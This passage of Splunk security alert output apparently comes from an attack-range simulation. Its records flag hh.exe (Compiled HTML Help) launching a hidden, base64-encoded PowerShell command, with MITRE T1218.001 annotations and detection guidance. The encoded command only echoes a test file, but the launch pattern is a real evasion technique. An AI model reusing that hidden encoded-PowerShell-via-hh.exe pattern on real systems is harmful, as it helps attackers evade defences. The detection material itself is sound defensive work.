risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="cmd.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x29c", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x3f4", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x29c", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x3f4", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x17b0", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x1f64", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x17b0", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x1f64", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x1ce0", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x1ce8", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x1ce0", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x1ce8", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x1cdc", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x1b24", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x1cdc", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x1b24", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", 